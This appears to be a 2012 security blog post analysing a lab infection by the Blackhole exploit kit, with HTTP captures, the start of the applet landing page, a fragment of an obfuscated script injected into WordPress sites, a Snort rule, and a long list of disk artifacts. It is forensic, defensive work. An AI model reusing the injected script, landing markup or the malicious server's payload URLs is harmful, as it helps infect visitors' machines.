Saturday, September 22, 2012

Blackhole Disk Artifacts - A Complete Dump

Recently, I've been concentrating my activities on disk artifacts post-infection. Today, I fired up my lab and infected a system while grabbing as much information as possible.

Infection Point: hxxp://46.249.59.116/main.php?page=5a56c997ffff2f79

Date: 09/22/2012

Platform: Windows XP Pro, SP3, unpatched, Java 6 Update 29, Windows Media Player 9, No Adobe Flash, No Adobe Reader, IE 8, Windows Firewall Disabled, No AV.

Retention: Once this completed I took a full snapshot of the entire disk, to share or analyze further later. If you would like it, just twitter me @fknsec. The snapshot is about 1GB uncompressed.

Methodology: A snapshot of the entire disk and registry was taken prior to infection and compared against post infection for delta. Wireshark and IE were the only active applications on the system. I used Wireshark, Installrite, VirtualBox, Windows XP and IE8. It should be noted that in the disk capture, Windows Media player did go through its initial startup.

The Infection

First and foremost, I entered the URL into Internet Explorer, where Java launched I was presented with the standard "Please wait while page is loading" in the center of the screen. The first file served up to me was Gam.jar. Response is nginx chunked, nothing unusual here.

GET /main.php?page=5a56c997ffff2f79 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 46.249.59.116
Connection: Keep-Alive



HTTP/1.1 200 OK
Server: nginx
Date: Sat, 22 Sep 2012 16:32:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.15



1fb8

<html><body><applet archive="Gam.jar"/code="plugindetecta.plugindetecta"><param name="uid" value=N0b0909041f31312b343c272b3e3c423e3c373734310a3c040b043d2c393e2900373e0235391c /></applet><script>md="a";r="replace";rrr="getAttribute";rr="reverse";</script><b id="b"
 Searching on the opening offset:0 of the response, I come up with 313 hits in google, mostly from jsunpack, including some variations like this (with a missing "/" after Gam.jar":
<html><body><applet archive="Gam.jar" code="importantThinga.importantThinga">
http://jsunpack.jeek.org/dec/go?report=cecd770436c23a953511f66befcc12da8cbeb7cb

Additionally, some of the entries noted come back with the <script>abre variant with is all too common with SQL injected Wordpress pages.
<script>try{awebw++;}catch(awtbawt){try{nta23t|15232}catch(tabsd){m=Math;ev=window[""+"e"+"val"];
http://jsunpack.jeek.org/dec/go?report=71f9a841aeebe2944633c46950f9848a4a8c8bb6

I am currently aware of approximately 1,600+ Wordpress sites which are currently infected with this script. Some of these triggered AVG's online shield


Next, Windows Media player was launched with the file name hcp_asx. I found it interesting that this version of blackhole hit Windows Media player for exploit before any other available exploits on the system. Not going to get into this because some analysis already exists here and those of you using snort are likely familiar with this rule:

emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET
$HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP ovflow Media
Player lt 10"; flow:established,to_server; content:"/hcp_asx.php?f=";
http_uri; pcre:"/hcp_asx\.php\?f=\d+$/U"; classtype:trojan-activity;
sid:2013077; rev:1;)


So the system was compromised by blackhole and a bunch of stuff happened. Let's look at what happens on the disk. The binary was delivered HTTP attachment.


GET /w.php?f=97d19&e=0 HTTP/1.1
User-Agent: Java/1.6.0_29
Host: 46.249.59.116
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 22 Sep 2012 16:32:21 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.15
Pragma: public
Expires: Sat, 22 Sep 2012 16:32:21 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="about.exe"
Content-Transfer-Encoding: binary
Content-Length: 288615


MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

No callouts were observed.
What Happened on The Disk
The creation of v.class by the root process java as well as the downloaderwgsdgsdgdsgsd.exe in the users temp folder is consistent with most of the activity I have been analyzing lately.

A full list here is included of all the files created, edited (size changes) and deleted from the system, as well as all registry entries.

I was well aware of hsperfdata_%username% as a disk artifact, not necessarily of infection, but as an indicator that java had executed at a specific time/date stamp. There were a series of cache folders and files that were also created under....

documents and settings\%username%\Application Data\Sun\Java\Deployment\cache\6.0


Anywho... here is a dump of all the delta from the disk Admittedly some of this is the result of normal operations, however, I believe there is some good information on disk artifacts including the hsperfdata and the java cache information.



backhole1 - All Files

FileName Size Before Size After Attrib Before Attrib After Date Before Date After Version Before Version After CRC Before CRC After
C:\Documents and Settings\bomber\Application Data\Cesy 1KB D
C:\Documents and Settings\bomber\Application Data\Cesy\aqowe.ydb 2KB A 9/22/2012 12:34:00 PM
C:\Documents and Settings\bomber\Application Data\Feuw 1KB D
C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe 289KB A 9/22/2012 12:31:30 PM
C:\Documents and Settings\bomber\Application Data\Riafew 1KB D
C:\Documents and Settings\bomber\Application Data\Riafew\xiryq.quy 1KB A 9/22/2012 12:31:30 PM
C:\Documents and Settings\bomber\Application Data\Wireshark 1KB D
C:\Documents and Settings\bomber\Application Data\Wireshark\dfilters 1KB A 9/22/2012 12:32:39 PM
C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book 1KB D
C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book\bomber.wab 177KB A 9/22/2012 12:31:40 PM
C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book\bomber.wab~ 177KB A 9/22/2012 12:31:40 PM
C:\Documents and Settings\bomber\Application Data\Microsoft\Crypto\RSA\S-1-5-21-484763869-706699826-1060284298-1003\6b29ae44e85efac3c72ff4d1865d73f1_72b2dab9-a324-4085-acf9-f7c87e24dedd 1KB SA 9/22/2012 12:30:18 PM
C:\Documents and Settings\bomber\Application Data\Microsoft\Internet Explorer\Quick Launch\Windows Media Player.lnk 1KB A 9/22/2012 12:33:46 PM
C:\Documents and Settings\bomber\Application Data\Microsoft\Media Player\0009236B.wpl 1KB A 9/22/2012 12:34:04 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\0 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\1 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\10 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\11 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\12 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\13 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\14 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\15 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\16 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\17 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\18 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\19 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\2 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\20 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\21 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\22 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\23 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\24 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\25 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\26 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\27 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\28 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\29 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\3 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\30 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\31 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\32 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\33 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\34 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\35 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\36 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\37 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\38 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\39 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\4 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\40 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\41 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\42 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\42\32fd55ea-33417afb 34KB A 9/22/2012 12:31:27 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\42\32fd55ea-33417afb.idx 1KB A 9/22/2012 12:31:27 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\43 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\44 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\45 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\46 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\47 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\48 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\49 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\5 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\50 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\51 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\52 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\53 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\54 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\55 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\56 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\57 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\58 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\59 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\6 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\60 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\61 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\62 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\63 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\7 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\8 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\9 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\host 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\lastAccessed 1KB A 9/22/2012 12:31:27 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\muffin 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\tmp 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\deployment.properties 1KB A 9/22/2012 12:31:23 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\ext 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\log 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\0 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\1 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\10 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\11 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\12 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\13 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\14 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\15 1KB D
C:\Documents and Settings\bomber\Cookies\index.dat 33KB 33KB HSA HSA 9/22/2012 12:25:05 PM 9/22/2012 12:34:01 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Feeds Cache\index.dat 33KB 33KB HSA HSA 9/22/2012 12:16:43 PM 9/22/2012 12:28:34 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\DOMStore\index.dat 33KB 33KB HSA HSA 9/22/2012 12:16:43 PM 9/22/2012 12:29:35 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\DOMStore\A9JWFLPR\www.google[1].xml 1KB 1KB A A 9/22/2012 12:16:54 PM 9/22/2012 12:30:05 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG 2KB 2KB HA HA 9/22/2012 12:25:23 PM 9/22/2012 12:31:45 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML 13KB 13KB A A 9/22/2012 11:35:30 AM 9/22/2012 12:31:25 PM
C:\Documents and Settings\bomber\Local Settings\History\History.IE5\index.dat 66KB 66KB HSA HSA 9/22/2012 12:25:05 PM 9/22/2012 12:34:01 PM
C:\Documents and Settings\bomber\Local Settings\History\History.IE5\MSHist012012092220120923\index.dat 50KB 50KB HSA HSA 9/22/2012 12:16:43 PM 9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temp\jusched.log 2KB 9KB A A 9/22/2012 12:25:07 PM 9/22/2012 12:30:11 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\index.dat 443KB 476KB HSA HSA 9/22/2012 12:25:05 PM 9/22/2012 12:34:01 PM
C:\Documents and Settings\bomber\PrivacIE\index.dat 115KB 115KB HSA HSA 9/22/2012 12:16:43 PM 9/22/2012 12:28:34 PM
C:\Documents and Settings\bomber\Start Menu\Programs\Windows Media Player.lnk 1KB 1KB A A 9/22/2012 11:50:09 AM 9/22/2012 12:33:46 PM
C:\Documents and Settings\bomber\Start Menu\Programs\Accessories\Entertainment\Windows Media Player.lnk 1KB 1KB A A 9/22/2012 11:50:09 AM 9/22/2012 12:33:46 PM
C:\Documents and Settings\NetworkService\Cookies\index.dat 17KB 17KB HSA HSA 9/22/2012 11:48:42 AM 9/22/2012 12:24:04 PM
C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat 17KB 17KB HSA HSA 9/22/2012 11:48:42 AM 9/22/2012 12:24:04 PM
C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat 33KB 33KB HSA HSA 9/22/2012 11:48:42 AM 9/22/2012 12:24:04 PM
C:\WINDOWS\wmsetup.log 1KB 2KB A A 9/22/2012 11:50:09 AM 9/22/2012 12:33:46 PM
C:\WINDOWS\Prefetch\CMD.EXE-087B4001.pf 14KB 15KB A A 9/22/2012 12:18:35 PM 9/22/2012 12:31:32 PM
C:\WINDOWS\Prefetch\CSRSS.EXE-12B63473.pf 25KB 25KB A A 9/22/2012 12:26:54 PM 9/22/2012 12:28:23 PM
C:\WINDOWS\Prefetch\IEXPLORE.EXE-27122324.pf 113KB 123KB A A 9/22/2012 12:16:49 PM 9/22/2012 12:28:43 PM
C:\WINDOWS\Prefetch\JAVAW.EXE-2DC32ABC.pf 50KB 107KB A A 9/22/2012 11:58:50 AM 9/22/2012 12:34:06 PM
C:\WINDOWS\Prefetch\NET.EXE-01A53C2F.pf 14KB 18KB A A 9/22/2012 12:18:30 PM 9/22/2012 12:33:30 PM
C:\WINDOWS\Prefetch\NET1.EXE-029B9DB4.pf 15KB 19KB A A 9/22/2012 12:18:30 PM 9/22/2012 12:33:30 PM
C:\WINDOWS\Prefetch\REGSVR32.EXE-25EEFE2F.pf 60KB 61KB A A 9/22/2012 11:50:16 AM 9/22/2012 12:34:07 PM
C:\WINDOWS\Prefetch\TASKMGR.EXE-20256C55.pf 19KB 21KB A A 9/22/2012 12:07:22 PM 9/22/2012 12:31:46 PM
C:\WINDOWS\Prefetch\UNREGMP2.EXE-07CACB61.pf 26KB 39KB A A 9/22/2012 11:50:09 AM 9/22/2012 12:33:46 PM
C:\WINDOWS\Prefetch\VERCLSID.EXE-3667BD89.pf 20KB 21KB A A 9/22/2012 12:26:26 PM 9/22/2012 12:33:46 PM
C:\WINDOWS\Prefetch\WINLOGON.EXE-32C57D49.pf 33KB 33KB A A 9/22/2012 12:26:54 PM 9/22/2012 12:28:24 PM
C:\WINDOWS\system32\CatRoot2\edb.chk 9KB 9KB A A 9/22/2012 12:26:41 PM 9/22/2012 12:28:41 PM
C:\WINDOWS\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb 3,154KB 3,154KB A A 9/22/2012 12:26:13 PM 9/22/2012 12:28:13 PM
C:\WINDOWS\system32\config\system.LOG 2KB 2KB HA HA 9/22/2012 12:26:22 PM 9/22/2012 12:33:33 PM
C:\WINDOWS\system32\wbem\Logs\wbemcore.log 38KB 38KB A A 9/22/2012 12:21:49 PM 9/22/2012 12:31:35 PM
C:\WINDOWS\system32\wbem\Logs\wbemess.log 3KB 4KB A A 9/22/2012 12:25:07 PM 9/22/2012 12:33:30 PM
C:\WINDOWS\system32\wbem\Logs\wbemprox.log 1KB 1KB A A 9/22/2012 11:49:59 AM 9/22/2012 12:31:35 PM
C:\WINDOWS\system32\wbem\Logs\wmiprov.log 1KB 1KB A A 9/22/2012 11:55:29 AM 9/22/2012 12:28:16 PM
C:\Documents and Settings\bomber\Cookies\GVNZ58AI.txt 1KB A 9/22/2012 12:06:45 PM
C:\Documents and Settings\bomber\Cookies\J695B3FR.txt 1KB A 9/22/2012 12:05:35 PM
C:\Documents and Settings\bomber\Cookies\JTYOEQBQ.txt 1KB A 9/22/2012 12:16:44 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{E4F1361D-04D0-11E2-A16B-08002765500A}.dat 5KB A 9/22/2012 12:23:34 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{E4F1361F-04D0-11E2-A16B-08002765500A}.dat 52KB A 9/22/2012 12:17:00 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\urlquery_net[1].htm 41KB A 9/22/2012 12:05:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\google_com[1].htm 108KB A 9/22/2012 12:16:53 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\qsonhs[2].aspx 1KB A 9/22/2012 12:16:45 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\redir_not_found[1].htm 6KB A 9/22/2012 12:05:35 PM
C:\System Volume Information 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\16 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\17 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\18 1KB D
C:\Documents and Settings\bomber\Application . Data\Sun\Java\Deployment\SystemCache\6.0\19 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\2 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\20 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\21 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\22 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\23 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\24 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\25 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\26 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\27 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\28 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\29 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\3 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\30 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\31 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\32 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\6c34baa0-5fe37a94 1KB A 9/22/2012 12:30:18 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\6c34baa0-5fe37a94.idx 1KB A 9/22/2012 12:30:18 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\33 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\34 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\35 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\36 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\37 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\38 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\39 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\4 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\40 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\41 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\42 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\43 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\44 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\45 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\46 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\47 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\48 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\49 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\5 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\50 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\51 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\52 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\53 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\54 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\55 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\56 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\57 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\58 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\59 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\6 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\60 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\61 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\62 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\63 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\7 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\8 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\9 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\lastAccessed 1KB A 9/22/2012 12:30:18 PM
C:\Documents and Settings\bomber\Cookies\GTT5VL6M.txt 1KB A 9/22/2012 12:30:58 PM
C:\Documents and Settings\bomber\Cookies\HR7RSVJY.txt 1KB A 9/22/2012 12:28:37 PM
C:\Documents and Settings\bomber\Cookies\OCZY31FB.txt 1KB A 9/22/2012 12:29:38 PM
C:\Documents and Settings\bomber\Cookies\SQUKNA2Q.txt 1KB A 9/22/2012 12:29:18 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities 1KB D
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857} 1KB D
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft 1KB D
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express 1KB D
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Folders.dbx 76KB A 9/22/2012 12:31:40 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Inbox.dbx 143KB A 9/22/2012 12:31:39 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Offline.dbx 10KB A 9/22/2012 12:31:40 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Sent Items.dbx 77KB A 9/22/2012 12:31:39 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{8CFA7582-04D2-11E2-A16C-08002765500A}.dat 5KB A 9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{8CFA7583-04D2-11E2-A16C-08002765500A}.dat 28KB A 9/22/2012 12:29:27 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{B1CEB060-04D2-11E2-A16C-08002765500A}.dat 33KB A 9/22/2012 12:30:24 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{CE9EB670-04D2-11E2-A16C-08002765500A}.dat 12KB A 9/22/2012 12:30:44 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{E0F1E810-04D2-11E2-A16C-08002765500A}.dat 12KB A 9/22/2012 12:31:03 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{ED37A190-04D2-11E2-A16C-08002765500A}.dat 4KB A 9/22/2012 12:31:17 PM
